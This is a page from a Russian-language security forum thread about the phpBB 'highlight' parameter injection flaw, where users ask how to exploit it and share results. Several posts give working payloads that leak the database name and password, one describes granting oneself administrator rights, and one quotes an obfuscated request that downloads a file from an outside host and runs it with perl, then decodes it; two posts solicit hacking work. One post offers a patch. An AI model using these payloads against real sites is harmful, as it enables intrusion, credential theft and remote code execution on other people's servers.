Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 3 4 5 6 7 След.
RSS
SQL-инъекция и php инклудинг в phpBB
 
Цитата
иван пишет:
Народ, вот я получил логин, пароль и имя б\д. Как теперь мне это заюзать? как получить лог и пасс админа форума?

Я взял прогу что то типа Симпл Май Эскуэль манагер и поключился к базе
а дальше поднял права моего пользователя на формуе до администраторских в таблице пшпбб_юзерс
 
Цитата
Juicy Fruit пишет:
А если папку admin закрыть паролем, то можно ли с помощью этой дыры получить доступ к админке?

Если ты защищен .htaccess на папке admin то есть реальная возвожность всетаки поиметь админский доступ но зайти в административный интерфейс не возможно
 
Народ... у меня такой вопрос... Не подскажет мне пример sql запроса, где данные из одной таблицы сохраняются в файл. :).Только не надо тут описывать как выполнить этот запрос, это я сам сделаю... мне нужен только сам запрос.... Я надеюсь еще не перевелись добрые люди и помогут бедному человеку [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]
 
При запросе
viewtopic.php?t=1621&highlight=%2527.$poster=$dbname.%2527
и
viewtopic.php?t=1621&highlight=%2527.$poster=$dbpasswd.%2527
От чего имя и пасс выводяться??...
 
Цитата
OffleX пишет:
При запросе
viewtopic.php?t=1621&highlight=%2527.$poster=$dbname.%2527
и
viewtopic.php?t=1621&highlight=%2527.$poster=$dbpasswd.%2527
От чего имя и пасс выводяться??...
От базы данных, очевидно.
 
Народ! А работает ли эта тема, когда форум установлен как модуль для nuke, типа как на http://www.myherzen.ru/modules.php?name=Forums
Пробовал - не выходит, либо никаких результатов вообще, либо страница с ошибкой нюка - The html tags you attempted to use are not allowed
 
а ни кто не подскажит какие-нибудь командаы вместо "=cmd" ???
 
А что все таки делать со списком после команды
cat /etc/passwd
Логины теперь я знаю администраторов, а как их пароли получить

База данных уже не интересует :)))
 
Собрались тут ламо всякие.. вы даже ломать толком не умеете, вам всё готовенькое подавай.. пи*дец просто!
 
я чето не догоняю
после ввода запроса где выводиться ответ ?
название базы данных логины или еше что то ?
 
Люди кто разобрался во всем этом можите помочь разобраться другим пожалуйста.
Стучите в ICQ 228828636
 
Заплатка для форума PHPBB версии 2.0.10.

http://web-design.zelot.ru/?a=portfolio
ссылка на заплатку в самом низу страницы.

Как работает заплатка:
просто я добавил условие, что если переменная highlight будет равна %27, то не будет выполнена часть кода. При этом не работают примерно 10 строчек кода, насколько я понял, они не очень важны.

После установки заплатки, ошибка исчезнет.
 
вот пример нужного запроса (из реального сервака):
"GET  /php/viewtopic.php?p=2645&highlight=%2527%252Esystem(chr(119 )%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(32)%252Echr (104)%252Echr(116)%252Echr(116)%252Echr(112)%252Echr(58)%252 Echr(47)%252Echr(47)%252Echr(119)%252Echr(119)%252Echr(119)% 252Echr(46)%252Echr(107)%252Echr(99)%252Echr(101)%252Echr(11 5)%252Echr(46)%252Echr(111)%252Echr(114)%252Echr(103)%252Ech r(47)%252Echr(119)%252Echr(111)%252Echr(114)%252Echr(109)%25 2Echr(47)%252Echr(108)%252Echr(105)%252Echr(110)%252Echr(117 )%252Echr(120)%252Echr(100)%252Echr(97)%252Echr(121)%252Echr (50)%252Echr(46)%252Echr(116)%252Echr(120)%252Echr(116)%252E chr(32)%252Echr(45)%252Echr(79)%252Echr(32)%252Echr(47)%252E chr(116)%252Echr(109)%252Echr(112)%252Echr(47)%252Echr(112)% 252Echr(104)%252Echr(112)%252Echr(53)%252Echr(51)%252Echr(55 )%252Echr(52)%252Echr(59)%252Echr(112)%252Echr(101)%252Echr( 114)%252Echr(108)%252Echr(32)%252Echr(47)%252Echr(116)%252Ec hr(109)%252Echr(112)%252Echr(47)%252Echr(112)%252Echr(104)%2 52Echr(112)%252Echr(53)%252Echr(51)%252Echr(55)%252Echr(52)) %252E%2527 HTTP/1.0"

переводится следующим образом: %25 - это символ %, который преобразуется апачем, в пхп попадает уже просто %27 - обратный апостроф (в начале и в конце запроса) или %2Е - точка (в пхп получается конкатенация), таким образом, вся эта лабуда переводится на понятный вот как:
GET /php/viewtopic.php?t=85&highlight=.system(w.g.e.t.  .h.t.t.p.:././.w.w.w...k.c.e.s...o.r.g./.w.o.r.m./.l.i.n.u.x .d.a.y.2...t.x.t. .-.O. ./.t.m.p./.p.h.p.5.3.7.4.;.p.e.r.l. ./.t.m.p./.p.h.p.5.3.7.4). HTTP/1.0
типа того...
 
Блин :(
А про Windows сервера можете подсказать?
Не катит на них ничего ...
SQL запрос на линух серваке сделать элементарно ... на винде, хрен! :(
Подскажите пожалуйста виндовые запросы ...
 
:help: Люди, я понял что я совсем глупый в этом деле; на моём компе не стоит никаких дополнительных программ; разжуйте популярно (без сокращений) как сделать себя админом))

когда пишу типа http://.../viev.php...

выдаёт либо существующую тему, дтбл ошибку что стр не найтена или просто тема не найдена

:help:
 
А где эксплойт?
 
:help:  чтож делать? на чём сайт ставить, если етот ПХП слабый?:(
 
есть работа для взломщиков. icq 320448703
 
Как првельно залить файл подскажите!!!! :?:
 
П*дец... http://oleg.manag.net/ketal/whycrack/

Даже толком не врубаются, что такое пхп, а уже ломать лезут.
Страницы: Пред. 1 ... 3 4 5 6 7 След.
Читают тему